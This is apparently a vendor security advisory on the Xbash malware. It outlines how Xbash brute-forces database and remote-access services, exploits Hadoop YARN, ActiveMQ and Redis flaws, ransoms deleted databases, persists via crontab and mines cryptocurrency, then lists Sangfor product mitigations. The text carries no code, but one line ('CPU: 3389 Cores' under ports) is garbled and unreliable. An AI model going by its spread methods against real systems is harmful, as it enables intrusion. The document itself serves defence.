Xbash is developed in Python and then converted to Portable Executable (PE) file to evade detection, assuring installation and execute commands cross platforms.
The ports are as follows:
CPU: 3389 Cores
Xbash uses weak passwords and built-in dictionary in its attacks against services on Rsync, VNC, phpmyadmin, MySQL, postgresql, mongodb and redis.
If successfully logs into the web service on MySQL, MongoDB, PostgreSQL, it may delete the database on server, create a new one and write message to demand for ransom.
The following vulnerabilities may be exploited to spread the ransomware, as shown below:
Hadoop YARN ResourceManager vulnerability allows execution without verifying the identify
ActiveMQ vulnerability allows writing in arbitrary file
Redis vulnerability allows writing in arbitrary file and remote execution
It writes in a corresponding Crontab task to start up automatically, according to the schedule and downloaded mining script. After removing all other family of mining program on Linux based system, it downloads and executes its own mining program.
1. Change computer password to a stronger one. Avoid using the same passwords for different computers because if one computer is compromised, all other computers may also be compromised.
2. Keep the malware signature database on your Sangfor NGAF up to data to enable Xbash traffic detection.
3. Enable WAF on your Sangfor NGAF and prevent Xbash attacks against websites.
4. Sangfor NGAF can prevent brute-force attacks. Turn on brute-force attack prevention NGAF.
5. Perform security scan and virus removal on the whole network. We recommend Sangfor NGAF and EDR tool to detect, prevent and protect your internal network. And for individuals, download and install the following tool: http://go.sangfor.com/edr-tool-20180921